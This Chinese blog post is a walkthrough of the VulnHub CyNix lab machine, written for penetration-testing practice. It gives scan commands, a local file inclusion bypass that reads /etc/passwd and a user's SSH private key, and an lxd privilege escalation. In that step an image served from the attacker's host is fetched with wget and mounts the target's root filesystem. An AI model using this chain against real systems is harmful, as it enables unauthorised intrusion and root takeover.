vulnhub靶机 CyNix

最新推荐文章于 2024-07-25 17:11:44 发布
最新推荐文章于 2024-07-25 17:11:44 发布
阅读量171 收藏
点赞数
分类专栏: Vulfocus打靶 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52178795/article/details/131295528
版权

下载靶机

地址:https://www.vulnhub.com/entry/cynix-1,394/

问题阐述

使用virtualbox,kali和靶机均使用桥接网络

kali:172.20.10.10 靶机:172.20.10.14

打靶目标

获取到root权限

打靶过程

信息搜集

nmap主机探活,做端口扫描

nmap -v -sP 172.20.10.1/24

nmap -sV -sC 172.20.10.14 -p 1-10000

gobuster 扫描目录

gobuster dir -u http://172.20.10.14 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

漏洞利用 

直接访问查看,发现有一个留言板,burpsuite抓包,发现跳转cnayoubypassme.php

 访问http://172.20.10.14/lavalamp/canyoubypassme.php ,查看网页源代码,发现网页有一个框

再三查看,发现一个透明度为0的地方,直接改为1.0,此时显示如下

还有一个问题,此界面路径为/lavalamp/canyoubypassme.php,响应路径也为lavalamp/canyoubypassme.php,盲猜一手文件包含

随便输入一个数字,出现如下界面

直接抓包,本地文件读取漏洞,直接读取/etc/passwd 文件失败,但是再路径前随便加个字符串就绕过了

通过/etc/passwd可以看到系统中还有一个用户ford,尝试读取用户密钥,成功读取到

 直接复制密钥到本地,使用ssh登录,前面做端口扫描的时候有扫到ssh端口6688

ssh -i id_rsa ford@172.20.10.14 -p 6688

 这里有一个flag

权限提升

查看当前用户权限 ,发现是 lxd 组 故可以用 lxd 提权

 

介绍:

LXC是Linux容器的缩写,Linux容器是一种操作系统,用于通过单个Linux内核在受控主机上虚拟运行多个Linux系统。
LXC与内核的cgroup捆绑在一起,为进程和网络空间提供功能,而不是创建一个完整的虚拟机,并为应用程序提供一个隔离的环境。

LXC代表Linux容器,它是一种用于操作系统虚拟化的工具。通过使用LXC,可以在虚拟环境中而不是在物理系统中操作任何软件或应用程序。虚拟环境功能使LXC更加安全,成本也更低。LXC很容易操作,因为它带有控制组【Control groups Cgroups】功能。
 

LXD代表Linux Daemon,它是一个扩展,主要用于指导LXC。它用于向LXC提供新的属性和功能,以便以更有效的方式使用LXC。LXD和LXC之间的通信是通过使用内置库完成的,liblxc就是这样一个库。

lxd 提权

查看镜像列表 
lxc image list

 kali攻击机上下载制作lxc提权镜像

git clone https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder

./build-alpine

 

本地开启http服务

python3 -m http.server 8000

靶机下载下来

wget http://172.20.10.10:8000/alpine-v3.18-x86_64-20230619_1213.tar.gz

靶机上导入lxc镜像并查看

lxc image import ./alpine-v3.18-x86_64-20230619_1213.tar.gz  --alias hack
lxc image list

靶机上创建lxc实例并配置后启动

lxc init hack hack -c security.privileged=true

lxc config device add hack hack disk source=/ path=/mnt/root recursive=true

//在/mnt/root 下挂载整个磁盘

lxc start hack

最后一步  

lxc exec hack  /bin/sh //与容器交换
此时即为root权限
凉城木槿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶机CYNIX_ 1
LainWith的博客
01-15 1768
目录介绍信息收集主机发现主机信息探测网站探测目录扫描网站测试读取SSH私钥SSH连接靶机第一个Flag提权lxd提权第二个Flag参考 介绍 难度:中等 靶机发布日期:2019年11月27日 Flag两个:User flag: user.txt;Root flag: root.txt 靶机地址:https://www.vulnhub.com/entry/cynix-1,394/ ​ 学习:LXD提权 信息收集 主机发现 netdiscover主机发现 额,,无法通过主机名区分开哪个才是靶机。 sudo ne
Vulnhub靶机实战-CYNIX 1
黑白的博客
01-18 542
声明 好好学习,天天向上 搭建 官方建议virtual打开,我这里都调成桥接 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.121 -p 1-65535 -oN nmap.A 开启端口 发现开启80,6688 访问80 http://192.168.31.121 目录扫描 gobuster dir -u http://192.168.31.121 -w /usr/share/wordlists/dirbuster/directory-lis
vulnhub靶机DC1
weixin_52450702的博客
10-29 934
靶机DC1IP:192.168.70.160。
vulnhub靶机corrosion1
weixin_52450702的博客
11-18 675
vulnhub靶机corrosion1
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
企业如何保证公司内网安全
shunyou0526的博客
07-25 320
部署防火墙和入侵检测系统:作为内网安全的第一道防线,防火墙和入侵检测系统能够有效阻止外部攻击和恶意软件的入侵。访问控制与身份验证:实施严格的访问控制策略,结合多因素认证(MFA),确保只有授权用户才能访问关键系统和数据。日志管理:建立全面的日志记录和审计机制,对所有数据访问、修改、删除等操作进行记录,以便于追踪和分析。电脑监控软件:使用电脑监控软件来监控员工的屏幕活动、上网行为等,防止内部威胁和不当使用公司资源。反病毒软件与反间谍软件:部署反病毒软件和反间谍软件等恶意软件防护工具,实时监测和清除恶意软件。
极速下载!青苹果系统Win7旗舰版:稳定安全!
lihuiyun184291的博客
07-25 400
今天系统之家小编给大家带来了青苹果系统Win7旗舰版镜像,该版本系统离线制作而成,安全无病毒,还升级了防火墙功能,大家安装后时刻都能放心操作。同时,它是在保持原有的功能并适度优化,保留下来的功能轻松满足大家的使用需求,系统稳定性也很高,运作顺畅不卡顿。
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 481
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1129
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
HDShredder 7 企业版案例分享: 依照国际权威标准,安全清除企业数据
sanyuan7783的博客
07-24 1179
符合国际权威标准软件操作符合多种主流国际权威标准,包括 DoD 5200, BSI, VSITR, NCSC, NIST 及 GOST,支持擦除单个分区和区域,并可自由定制擦除模式。对于“Clear”清除级别,软件操作符合 ISO 27001, DIN 66399 以及 NIST SP 800-88R1要求。对于“Purge”级别,则使用 SecureErase 功能。安全擦除证书软件生成准确的安全清除证书,包括时间戳、序列号、以及清除过程的所有细节信息。远程擦除 - 使用 NetDisk 技术。
保障企业数据主权:安全可控的爬虫工具与管理平台
最新发布
zhou6343178的博客
07-25 674
在数据驱动的时代,企业对数据的需求日益增长,但如何在保障数据主权的前提下高效采集数据?本文深入探讨了选择安全可控爬虫工具与管理平台的重要性,分析了关键特性,并提出实用建议,助力企业维护数据安全,实现数据价值最大化。
数据库安全:MySQL安全配置,MySQL安全基线检查加固
wangyuxiang946的博客
07-23 2260
MySQL基线检查,基线配置,安全加固
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 863
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
后台管理系统登录安全和权限要求
JAVA领域优质创作者,基于分片网络查询方法专利发明者。
07-25 850
启用MFA后,系统将要求输入用户名和密码(第一安全要素),再进行输入来自其 MFA设备的动态验证码(第二安全要素),双因子的安全认证将为您的账户提供更高的安全保护。传统的用户名和密码认证容易受到破解、盗取或暴力破解等攻击方式的威胁,而双因子认证可以提供额外的安全层次,确保只有授权用户才能访问账户或系统。通过采用双因子认证,企业可以增加用户账号的安全性,降低身份盗窃和欺诈行为的风险,提高用户对系统的信任度。这在网络安全是极不安全的。订单管理:用于管理订单信息,包括查看订单、修改订单状态、发货、退货、退款等。
vulnhub靶机系列:
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凉城木槿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值